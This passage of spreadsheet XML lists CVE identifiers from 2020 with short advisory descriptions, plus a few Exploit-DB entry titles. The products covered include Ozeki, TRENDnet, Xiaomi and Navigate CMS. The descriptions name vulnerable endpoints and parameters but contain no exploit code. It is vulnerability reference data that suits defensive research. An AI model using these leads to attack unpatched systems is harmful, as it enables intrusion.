    <t>Zoho ManageEngine Applications Manager 14710 and before allows an authenticated admin user to upload a vulnerable jar in a specific location, which leads to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-14009</t>
  </si>
  <si>
    <t>Proofpoint Enterprise Protection (PPS/PoD) before 8.16.4 contains a vulnerability that could allow an attacker to deliver an email message with a malicious attachment that bypasses scanning and file-blocking rules. The vulnerability exists because messages with certain crafted and malformed multipart structures are not properly handled.</t>
  </si>
  <si>
    <t>CVE-2020-1401</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1400, CVE-2020-1407.</t>
  </si>
  <si>
    <t>exploits/windows/local/48618.txt</t>
  </si>
  <si>
    <t>Lansweeper 7.2 - Incorrect Access Control</t>
  </si>
  <si>
    <t>2020-06-23</t>
  </si>
  <si>
    <t>CVE-2020-14010</t>
  </si>
  <si>
    <t>The Laborator Xenon theme 1.3 for WordPress allows Reflected XSS via the data/typeahead-generate.php q (aka name) parameter.</t>
  </si>
  <si>
    <t>CVE-2020-14011</t>
  </si>
  <si>
    <t>Lansweeper 6.0.x through 7.2.x has a default installation in which the admin password is configured for the admin account, unless "Built-in admin" is manually unchecked. This allows command execution via the Add New Package and Scheduled Deployments features.</t>
  </si>
  <si>
    <t>CVE-2020-14012</t>
  </si>
  <si>
    <t>scp/categories.php in osTicket 1.14.2 allows XSS via a Knowledgebase Category Name or Category Description. The attacker must be an Agent.</t>
  </si>
  <si>
    <t>CVE-2020-14014</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS 2.8 and 2.9 r1433. The query parameter fid on the resource navigate.php does not perform sufficient data validation and/or encoding, making it vulnerable to reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-14015</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS 2.9 r1433. When performing a password reset, a user is emailed an activation code that allows them to reset their password. There is, however, a flaw when no activation code is supplied. The system will allow an unauthorized user to continue setting a password, even though no activation code was supplied, setting the password for the most recently created user in the system (the user with the highest user id).</t>
  </si>
  <si>
    <t>CVE-2020-14016</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS 2.9 r1433. The forgot-password feature allows users to reset their passwords by using either their username or the email address associated with their account. However, the feature returns a not_found message when the provided username or email address does not match a user in the system. This can be used to enumerate users.</t>
  </si>
  <si>
    <t>CVE-2020-14017</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS 2.9 r1433. Sessions, as well as associated information such as CSRF tokens, are stored in cleartext files in the directory /private/sessions. An unauthenticated user could use a brute-force approach to attempt to identify existing sessions, or view the contents of this file to discover details about a session.</t>
  </si>
  <si>
    <t>CVE-2020-14018</t>
  </si>
  <si>
    <t>An issue was discovered in Navigate CMS 2.9 r1433. There is a stored XSS vulnerability that is executed on the page to view users, and on the page to edit users. This is present in both the User field and the E-Mail field. On the Edit user page, the XSS is only triggered via the E-Mail field; however, on the View user page the XSS is triggered via either the User field or the E-Mail field.</t>
  </si>
  <si>
    <t>CVE-2020-14019</t>
  </si>
  <si>
    <t>Open-iSCSI rtslib-fb through 2.1.72 has weak permissions for /etc/target/saveconfig.json because shutil.copyfile (instead of shutil.copy) is used, and thus permissions are not preserved.</t>
  </si>
  <si>
    <t>CVE-2020-1402</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows ActiveX Installer Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14021</t>
  </si>
  <si>
    <t>An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The ASP.net SMS module can be used to read and validate the source code of ASP files. By altering the path, it can be made to read any file on the Operating System, usually with NT AUTHORITY\SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-14022</t>
  </si>
  <si>
    <t>Ozeki NG SMS Gateway 4.17.1 through 4.17.6 does not check the file type when bulk importing new contacts ("Import Contacts" functionality) from a file. It is possible to upload an executable or .bat file that can be executed with the help of a functionality (E.g. the "Application Starter" module) within the application.</t>
  </si>
  <si>
    <t>CVE-2020-14023</t>
  </si>
  <si>
    <t>Ozeki NG SMS Gateway through 4.17.6 allows SSRF via SMS WCF or RSS To SMS.</t>
  </si>
  <si>
    <t>CVE-2020-14024</t>
  </si>
  <si>
    <t>Ozeki NG SMS Gateway through 4.17.6 has multiple authenticated stored and/or reflected XSS vulnerabilities via the (1) Receiver or Recipient field in the Mailbox feature, (2) OZFORM_GROUPNAME field in the Group configuration of addresses, (3) listname field in the Defining address lists configuration, or (4) any GET Parameter in the /default URL of the application.</t>
  </si>
  <si>
    <t>CVE-2020-14025</t>
  </si>
  <si>
    <t>Ozeki NG SMS Gateway through 4.17.6 has multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes such as installing new modules or changing a password.</t>
  </si>
  <si>
    <t>CVE-2020-14026</t>
  </si>
  <si>
    <t>CSV Injection (aka Excel Macro Injection or Formula Injection) exists in the Export Of Contacts feature in Ozeki NG SMS Gateway through 4.17.6 via a value that is mishandled in a CSV export.</t>
  </si>
  <si>
    <t>CVE-2020-14027</t>
  </si>
  <si>
    <t>An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The database connection strings accept custom unsafe arguments, such as ENABLE_LOCAL_INFILE, that can be leveraged by attackers to enable MySQL Load Data Local (rogue MySQL server) attacks.</t>
  </si>
  <si>
    <t>CVE-2020-14028</t>
  </si>
  <si>
    <t>An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. By leveraging a path traversal vulnerability in the Autoreply module's Script Name, an attacker may write to or overwrite arbitrary files, with arbitrary content, usually with NT AUTHORITY\SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-14029</t>
  </si>
  <si>
    <t>An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The RSS To SMS module processes XML files in an unsafe manner. This opens the application to an XML External Entity attack that can be used to perform SSRF or read arbitrary local files.</t>
  </si>
  <si>
    <t>CVE-2020-1403</t>
  </si>
  <si>
    <t>CVE-2020-14030</t>
  </si>
  <si>
    <t>An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. It stores SMS messages in .NET serialized format on the filesystem. By generating (and writing to the disk) malicious .NET serialized files, an attacker can trick the product into deserializing them, resulting in arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-14031</t>
  </si>
  <si>
    <t>An issue was discovered in Ozeki NG SMS Gateway through 4.17.6. The outbox functionality of the TXT File module can be used to delete all/most files in a folder. Because the product usually runs as NT AUTHORITY\SYSTEM, the only files that will not be deleted are those currently being run by the system and/or files that have special security attributes (e.g., Windows Defender files).</t>
  </si>
  <si>
    <t>CVE-2020-14032</t>
  </si>
  <si>
    <t>ASRock 4x4 BOX-R1000 before BIOS P1.40 allows privilege escalation via code execution in the SMM.</t>
  </si>
  <si>
    <t>CVE-2020-14033</t>
  </si>
  <si>
    <t>An issue was discovered in janus-gateway (aka Janus WebRTC Server) through 0.10.0. janus_streaming_rtsp_parse_sdp in plugins/janus_streaming.c has a Buffer Overflow via a crafted RTSP server.</t>
  </si>
  <si>
    <t>CVE-2020-14034</t>
  </si>
  <si>
    <t>An issue was discovered in janus-gateway (aka Janus WebRTC Server) through 0.10.0. janus_get_codec_from_pt in utils.c has a Buffer Overflow via long value in an SDP Offer packet.</t>
  </si>
  <si>
    <t>CVE-2020-14039</t>
  </si>
  <si>
    <t>In Go before 1.13.13 and 1.14.x before 1.14.5, Certificate.Verify may lack a check on the VerifyOptions.KeyUsages EKU requirements (if VerifyOptions.Roots equals nil and the installation is on Windows). Thus, X.509 certificate verification is incomplete.</t>
  </si>
  <si>
    <t>CVE-2020-1404</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1413, CVE-2020-1414, CVE-2020-1415, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-14040</t>
  </si>
  <si>
    <t>The x/text package before 0.3.3 for Go has a vulnerability in encoding/unicode that could lead to the UTF-16 decoder entering an infinite loop, causing the program to crash or run out of memory. An attacker could provide a single byte to a UTF16 decoder instantiated with UseBOM or ExpectBOM to trigger an infinite loop if the String function on the Decoder is called, or the Decoder is passed to golang.org/x/text/transform.String.</t>
  </si>
  <si>
    <t>CVE-2020-14042</t>
  </si>
  <si>
    <t>** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Cross Site Scripting (XSS) vulnerability was found in Codiad v1.7.8 and later. The vulnerability occurs because of improper sanitization of the folder's name $path variable in components/filemanager/class.filemanager.php. NOTE: the vendor states "Codiad is no longer under active maintenance by core contributors."</t>
  </si>
  <si>
    <t>CVE-2020-14043</t>
  </si>
  <si>
    <t>** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Cross Side Request Forgery (CSRF) vulnerability was found in Codiad v1.7.8 and later. The request to download a plugin from the marketplace is only available to admin users and it isn't CSRF protected in components/market/controller.php. This might cause admins to make a vulnerable request without them knowing and result in remote code execution. NOTE: the vendor states "Codiad is no longer under active maintenance by core contributors."</t>
  </si>
  <si>
    <t>CVE-2020-14044</t>
  </si>
  <si>
    <t>** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Server-Side Request Forgery (SSRF) vulnerability was found in Codiad v1.7.8 and later. A user with admin privileges could use the plugin install feature to make the server request any URL via components/market/class.market.php. This could potentially result in remote code execution. NOTE: the vendor states "Codiad is no longer under active maintenance by core contributors."</t>
  </si>
  <si>
    <t>CVE-2020-14048</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus before 11.1 build 11115 allows remote unauthenticated attackers to change the installation status of deployed agents.</t>
  </si>
  <si>
    <t>CVE-2020-14049</t>
  </si>
  <si>
    <t>Viber for Windows up to 13.2.0.39 does not properly quote its custom URI handler. A malicious website could launch Viber with arbitrary parameters, forcing a victim to send an NTLM authentication request, and either relay the request or capture the hash for offline password cracking. NOTE: this issue exists because of an incomplete fix for CVE-2019-12569.</t>
  </si>
  <si>
    <t>CVE-2020-1405</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions, aka 'Windows Mobile Device Management Diagnostics Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1372.</t>
  </si>
  <si>
    <t>CVE-2020-14054</t>
  </si>
  <si>
    <t>SOKKIA GNR5 Vanguard WEB version 1.2 (build: 91f2b2c3a04d203d79862f87e2440cb7cefc3cd3) and hardware version 212 allows remote attackers to bypass admin authentication via a SQL injection attack that uses the User Name or Password field on the login page.</t>
  </si>
  <si>
    <t>CVE-2020-14055</t>
  </si>
  <si>
    <t>Monsta FTP 2.10.1 or below is prone to a stored cross-site scripting vulnerability in the language setting due to insufficient output encoding.</t>
  </si>
  <si>
    <t>CVE-2020-14056</t>
  </si>
  <si>
    <t>Monsta FTP 2.10.1 or below is prone to a server-side request forgery vulnerability due to insufficient restriction of the web fetch functionality. This allows attackers to read arbitrary local files and interact with arbitrary third-party services.</t>
  </si>
  <si>
    <t>CVE-2020-14057</t>
  </si>
  <si>
    <t>Monsta FTP 2.10.1 or below allows external control of paths used in filesystem operations. This allows attackers to read and write arbitrary local files, allowing an attacker to gain remote code execution in common deployments.</t>
  </si>
  <si>
    <t>CVE-2020-14058</t>
  </si>
  <si>
    <t>An issue was discovered in Squid before 4.12 and 5.x before 5.0.3. Due to use of a potentially dangerous function, Squid and the default certificate validation helper are vulnerable to a Denial of Service when opening a TLS connection to an attacker-controlled server for HTTPS. This occurs because unrecognized error values are mapped to NULL, but later code expects that each error value is mapped to a valid error string.</t>
  </si>
  <si>
    <t>CVE-2020-14059</t>
  </si>
  <si>
    <t>An issue was discovered in Squid 5.x before 5.0.3. Due to an Incorrect Synchronization, a Denial of Service can occur when processing objects in an SMP cache because of an Ipc::Mem::PageStack::pop ABA problem during access to the memory page/slot management list.</t>
  </si>
  <si>
    <t>CVE-2020-1406</t>
  </si>
  <si>
    <t>CVE-2020-14060</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).</t>
  </si>
  <si>
    <t>CVE-2020-14061</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).</t>
  </si>
  <si>
    <t>CVE-2020-14062</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).</t>
  </si>
  <si>
    <t>CVE-2020-14063</t>
  </si>
  <si>
    <t>A stored Cross-Site Scripting (XSS) vulnerability in the TC Custom JavaScript plugin before 1.2.2 for WordPress allows unauthenticated remote attackers to inject arbitrary JavaScript via the tccj-content parameter. This is displayed in the page footer of every front-end page and executed in the browser of visitors.</t>
  </si>
  <si>
    <t>CVE-2020-14064</t>
  </si>
  <si>
    <t>IceWarp Email Server 12.3.0.1 has Incorrect Access Control for user accounts.</t>
  </si>
  <si>
    <t>CVE-2020-14065</t>
  </si>
  <si>
    <t>IceWarp Email Server 12.3.0.1 allows remote attackers to upload files and consume disk space.</t>
  </si>
  <si>
    <t>CVE-2020-14066</t>
  </si>
  <si>
    <t>IceWarp Email Server 12.3.0.1 allows remote attackers to upload JavaScript files that are dangerous for clients to access.</t>
  </si>
  <si>
    <t>CVE-2020-14067</t>
  </si>
  <si>
    <t>The install_from_hash functionality in Navigate CMS 2.9 does not consider the .phtml extension when examining files within a ZIP archive that may contain PHP code, in check_upload in lib/packages/extensions/extension.class.php and lib/packages/themes/theme.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-14068</t>
  </si>
  <si>
    <t>An issue was discovered in MK-AUTH 19.01. The web login functionality allows an attacker to bypass authentication and gain client privileges via SQL injection in central/executar_login.php.</t>
  </si>
  <si>
    <t>CVE-2020-14069</t>
  </si>
  <si>
    <t>An issue was discovered in MK-AUTH 19.01. There are SQL injection issues in mkt/ PHP scripts, as demonstrated by arp.php, dhcp.php, hotspot.php, ip.php, pgaviso.php, pgcorte.php, pppoe.php, queues.php, and wifi.php.</t>
  </si>
  <si>
    <t>CVE-2020-1407</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1400, CVE-2020-1401.</t>
  </si>
  <si>
    <t>exploits/windows/webapps/49156.txt</t>
  </si>
  <si>
    <t>PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS</t>
  </si>
  <si>
    <t>CVE-2020-14070</t>
  </si>
  <si>
    <t>An issue was discovered in MK-AUTH 19.01. There is authentication bypass in the web login functionality because guessable credentials to admin/executar_login.php result in admin access.</t>
  </si>
  <si>
    <t>CVE-2020-14071</t>
  </si>
  <si>
    <t>An issue was discovered in MK-AUTH 19.01. XSS vulnerabilities in admin and client scripts allow an attacker to execute arbitrary JavaScript code.</t>
  </si>
  <si>
    <t>CVE-2020-14072</t>
  </si>
  <si>
    <t>An issue was discovered in MK-AUTH 19.01. It allows command execution as root via shell metacharacters to /auth admin scripts.</t>
  </si>
  <si>
    <t>CVE-2020-14073</t>
  </si>
  <si>
    <t>XSS exists in PRTG Network Monitor 20.1.56.1574 via crafted map properties. An attacker with Read/Write privileges can create a map, and then use the Map Designer Properties screen to insert JavaScript code. This can be exploited against any user with View Maps or Edit Maps access.</t>
  </si>
  <si>
    <t>CVE-2020-14074</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain a stack-based buffer overflow in the ssi binary. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.cgi via the action kick_ban_wifi_mac_allow with a sufficiently long qcawifi.wifi0_vap0.maclist key.</t>
  </si>
  <si>
    <t>CVE-2020-14075</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain multiple command injections in apply.cgi via the action pppoe_connect, ru_pppoe_connect, or dhcp_connect with the key wan_ifname (or wan0_dns), allowing an authenticated user to run arbitrary commands on the device.</t>
  </si>
  <si>
    <t>CVE-2020-14076</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain a stack-based buffer overflow in the ssi binary. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.cgi via the action st_dev_connect, st_dev_disconnect, or st_dev_rconnect with a sufficiently long wan_type key.</t>
  </si>
  <si>
    <t>CVE-2020-14077</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain a stack-based buffer overflow in the ssi binary. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.cgi via the action set_sta_enrollee_pin_wifi1 (or set_sta_enrollee_pin_wifi0) with a sufficiently long wps_sta_enrollee_pin key.</t>
  </si>
  <si>
    <t>CVE-2020-14078</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain a stack-based buffer overflow in the ssi binary. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.cgi via the action wifi_captive_portal_login with a sufficiently long REMOTE_ADDR key.</t>
  </si>
  <si>
    <t>CVE-2020-14079</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain a stack-based buffer overflow in the ssi binary. The overflow allows an authenticated user to execute arbitrary code by POSTing to apply.cgi via the action auto_up_fw (or auto_up_lp) with a sufficiently long update_file_name key.</t>
  </si>
  <si>
    <t>CVE-2020-1408</t>
  </si>
  <si>
    <t>CVE-2020-14080</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain a stack-based buffer overflow in the ssi binary. The overflow allows an unauthenticated user to execute arbitrary code by POSTing to apply_sec.cgi via the action ping_test with a sufficiently long ping_ipaddr key.</t>
  </si>
  <si>
    <t>CVE-2020-14081</t>
  </si>
  <si>
    <t>TRENDnet TEW-827DRU devices through 2.06B04 contain multiple command injections in apply.cgi via the action send_log_email with the key auth_acname (or auth_passwd), allowing an authenticated user to run arbitrary commands on the device.</t>
  </si>
  <si>
    <t>CVE-2020-1409</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that DirectWrite handles objects in memory, aka 'DirectWrite Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14092</t>
  </si>
  <si>
    <t>The CodePeople Payment Form for PayPal Pro plugin before 1.1.65 for WordPress allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2020-14093</t>
  </si>
  <si>
    <t>Mutt before 1.14.3 allows an IMAP fcc/postpone man-in-the-middle attack via a PREAUTH response.</t>
  </si>
  <si>
    <t>CVE-2020-14094</t>
  </si>
  <si>
    <t>In Xiaomi router R3600, ROM version&lt;1.0.20, the connection service can be injected through the web interface, resulting in stack overflow or remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-14095</t>
  </si>
  <si>
    <t>In Xiaomi router R3600, ROM version&lt;1.0.20, a connect service suffers from an injection vulnerability through the web interface, leading to a stack overflow or remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-14096</t>
  </si>
  <si>
    <t>Memory overflow in Xiaomi AI speaker Rom version &lt;1.59.6 can happen when the speaker verifying a malicious firmware during OTA process.</t>
  </si>
  <si>
    <t>CVE-2020-14097</t>
  </si>
  <si>
    <t>Wrong nginx configuration, causing specific paths to be downloaded without authorization. This affects Xiaomi router AX6 ROM version &lt; 1.0.18.</t>
  </si>
  <si>
    <t>CVE-2020-14098</t>
  </si>
  <si>
    <t>The login verification can be bypassed by using the problem that the time is not synchronized after the router restarts. This affects Xiaomi router AX1800rom version &lt; 1.0.336 and Xiaomi route RM1800 root version &lt; 1.0.26.</t>
  </si>
  <si>
    <t>CVE-2020-14099</t>
  </si>
  <si>
    <t>On Xiaomi router AX1800 rom version &lt; 1.0.336 and RM1800 root version &lt; 1.0.26, the encryption scheme for a user's backup files uses hard-coded keys, which can expose sensitive information such as a user's password.</t>
  </si>
  <si>
    <t>CVE-2020-1410</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when Windows Address Book (WAB) improperly processes vcard files.To exploit the vulnerability, an attacker could send a malicious vcard that a victim opens using Windows Address Book (WAB), aka 'Windows Address Book Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14100</t>
  </si>
  <si>
    <t>In Xiaomi router R3600 ROM version&lt;1.0.66, filters in the set_WAN6 interface can be bypassed, causing remote code execution. The router administrator can gain root access from this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-14101</t>
  </si>
  <si>
    <t>The data collection SDK of the router web management interface caused the leakage of the token. This affects Xiaomi router AX1800rom version &lt; 1.0.336 and Xiaomi route RM1800 root version &lt; 1.0.26.</t>
  </si>
  <si>
    <t>CVE-2020-14102</t>
  </si>
  <si>
    <t>There is command injection when ddns processes the hostname, which causes the administrator user to obtain the root privilege of the router. This affects Xiaomi router AX1800rom version &lt; 1.0.336 and Xiaomi route RM1800 root version &lt; 1.0.26.</t>
  </si>
  <si>
    <t>CVE-2020-14103</t>
  </si>
  <si>
    <t>The application in the mobile phone can read the SNO information of the device, Xiaomi 10 MIUI &lt; 2020.01.15.</t>
  </si>
  <si>
    <t>CVE-2020-14104</t>
  </si>
  <si>
    <t>A RACE CONDITION on XQBACKUP causes a decompression path error on Xiaomi router AX3600 with ROM version =1.0.50.</t>
  </si>
  <si>
    <t>CVE-2020-14105</t>
  </si>
  <si>
    <t>CVE-2020-14106</t>
  </si>
  <si>
    <t>The application in the mobile phone can unauthorized access to the list of running processes in the mobile phone, Xiaomi Mobile Phone MIUI &lt; 2021.01.26.</t>
  </si>
  <si>
    <t>CVE-2020-14107</t>
  </si>
  <si>
    <t>A stack overflow in the HTTP server of Cast can be exploited to make the app crash in LAN.</t>
  </si>
  <si>
    <t>CVE-2020-14109</t>
  </si>
  <si>
    <t>There is command injection in the meshd program in the routing system, resulting in command execution under administrator authority on Xiaomi router AX3600 with ROM version =&lt; 1.1.12</t>
  </si>
  <si>
    <t>CVE-2020-1411</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1336.</t>
  </si>
  <si>
    <t>CVE-2020-14110</t>
  </si>
  <si>
    <t>AX3600 router sensitive information leaked.There is an unauthorized interface through luci to obtain sensitive information and log in to the web background.</t>
  </si>
  <si>
    <t>CVE-2020-14111</t>
  </si>
  <si>
    <t>A command injection vulnerability exists in the Xiaomi Router AX3600. The vulnerability is caused by a lack of inspection for incoming data detection. Attackers can exploit this vulnerability to execute code.</t>
  </si>
  <si>
    <t>CVE-2020-14112</t>
  </si>
  <si>
    <t>Information Leak Vulnerability exists in the Xiaomi Router AX6000. The vulnerability is caused by incorrect routing configuration. Attackers can exploit this vulnerability to download part of the files in Xiaomi Router AX6000.</t>
  </si>
  <si>
    <t>CVE-2020-14114</t>
  </si>
  <si>
    <t>information leakage vulnerability exists in the Xiaomi SmartHome APP. This vulnerability is caused by illegal calls of some sensitive JS interfaces, which can be exploited by attackers to leak sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-14115</t>
  </si>
  <si>
    <t>CVE-2020-14116</t>
  </si>
  <si>
    <t>An intent redirection vulnerability in the Mi Browser product. This vulnerability is caused by the Mi Browser does not verify the validity of the incoming data. Attackers can perform sensitive operations by exploiting this.</t>
  </si>
  <si>
    <t>CVE-2020-14117</t>
  </si>
  <si>
    <t>A improper permission configuration vulnerability in Xiaomi Content Center APP. This vulnerability is caused by the lack of correct permission verification in the Xiaomi content center APP, and attackers can use this vulnerability to invoke the sensitive component functions of the Xiaomi content center APP.</t>
  </si>
  <si>
    <t>CVE-2020-14118</t>
  </si>
  <si>
    <t>An intent redirection vulnerability in the Mi App Store product. This vulnerability is caused by the Mi App Store does not verify the validity of the incoming data, can cause the app store to automatically download and install apps.</t>
  </si>
  <si>
    <t>CVE-2020-14119</t>
  </si>
  <si>
    <t>There is command injection in the addMeshNode interface of xqnetwork.lua, which leads to command execution under administrator authority on Xiaomi router AX3600 with rom versionrom&lt; 1.1.12</t>
  </si>
  <si>
    <t>CVE-2020-1412</t>
  </si>
  <si>
    <t>CVE-2020-14120</t>
  </si>
  <si>
    <t>Some Xiaomi models have a vulnerability in a certain application. The vulnerability is caused by the lack of checksum when using a three-party application to pass in parameters, and attackers can induce users to install a malicious app and use the vulnerability to achieve elevated privileges, making the normal services of the system affected.</t>
  </si>
  <si>
    <t>CVE-2020-14121</t>
  </si>
  <si>
    <t>A business logic vulnerability exists in Mi App Store. The vulnerability is caused by incomplete permission checks of the products being bypassed, and an attacker can exploit the vulnerability to perform a local silent installation.</t>
  </si>
  <si>
    <t>CVE-2020-14122</t>
  </si>
  <si>
    <t>Some Xiaomi phones have information leakage vulnerabilities, and some of them may be able to forge a specific identity due to the lack of parameter verification, resulting in user information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-14123</t>
  </si>
  <si>
    <t>There is a pointer double free vulnerability in Some MIUI Services. When a function is called, the memory pointer is copied to two function modules, and an attacker can cause the pointer to be repeatedly released through malicious operations, resulting in the affected module crashing and affecting normal functionality, and if successfully exploited the vulnerability can cause elevation of privileges.</t>
  </si>
  <si>
    <t>CVE-2020-14124</t>
  </si>
  <si>
    <t>There is a buffer overflow in librsa.so called by getwifipwdurl interface, resulting in code execution on Xiaomi router AX3600 with ROM version =rom&lt; 1.1.12.</t>
  </si>
  <si>
    <t>CVE-2020-14125</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in some Xiaomi models of phones. The vulnerability is caused by out-of-bound read/write and can be exploited by attackers to make denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14126</t>
  </si>
  <si>
    <t>Information leakage vulnerability exists in the Mi Sound APP. This vulnerability is caused by illegal calls of some sensitive JS interfaces, which can be exploited by attackers to leak sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-14127</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in some Xiaomi models of phones. The vulnerability is caused by heap overflow and can be exploited by attackers to make remote denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-14129</t>
  </si>
  <si>
    <t>A logic vulnerability exists in a Xiaomi product. The vulnerability is caused by an identity verification failure, which can be exploited by an attacker who can obtain a brief elevation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-1413</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1414, CVE-2020-1415, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-14130</t>
  </si>
  <si>
    <t>Some js interfaces in the Xiaomi community were exposed, causing sensitive functions to be maliciously called on Xiaomi community app Affected Version &lt;3.0.210809</t>
  </si>
  <si>
    <t>CVE-2020-14131</t>
  </si>
  <si>
    <t>The Xiaomi Security Center expresses heartfelt thanks to ADLab of VenusTech ! At the same time, we also welcome more outstanding and professional security experts and security teams to join the Mi Security Center (MiSRC) to jointly ensure the safe access of millions of Xiaomi users worldwide Life.</t>
  </si>
  <si>
    <t>CVE-2020-1414</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory, aka 'Windows Runtime Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1249, CVE-2020-1353, CVE-2020-1370, CVE-2020-1399, CVE-2020-1404, CVE-2020-1413, CVE-2020-1415, CVE-2020-1422.</t>
  </si>
  <si>
    <t>CVE-2020-14144</t>
  </si>
  <si>
    <t>** DISPUTED ** The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides."</t>
  </si>
  <si>
    <t>CVE-2020-14145</t>
  </si>
  <si>
    <t>The client side in OpenSSH 5.7 through 8.4 has an Observable Discrepancy leading to an information leak in the algorithm negotiation. This allows man-in-the-middle attackers to target initial connection attempts (where no host key for the server has been cached by the client). NOTE: some reports state that 8.5 and 8.6 are also affected.</t>
  </si>
  <si>
    <t>CVE-2020-14146</t>
  </si>
  <si>
    <t>KumbiaPHP through 1.1.1, in Development mode, allows XSS via the public/pages/kumbia PATH_INFO.</t>
  </si>
  <si>
    <t>CVE-2020-14147</t>
  </si>
  <si>
    <t>An integer overflow in the getnum function in lua_struct.c in Redis before 6.0.3 allows context-dependent attackers with permission to run Lua code in a Redis session to cause a denial of service (memory corruption and application crash) or possibly bypass intended sandbox restrictions via a large number, which triggers a stack-based buffer overflow. NOTE: this issue exists because of a CVE-2015-8080 regression.</t>
  </si>
  <si>
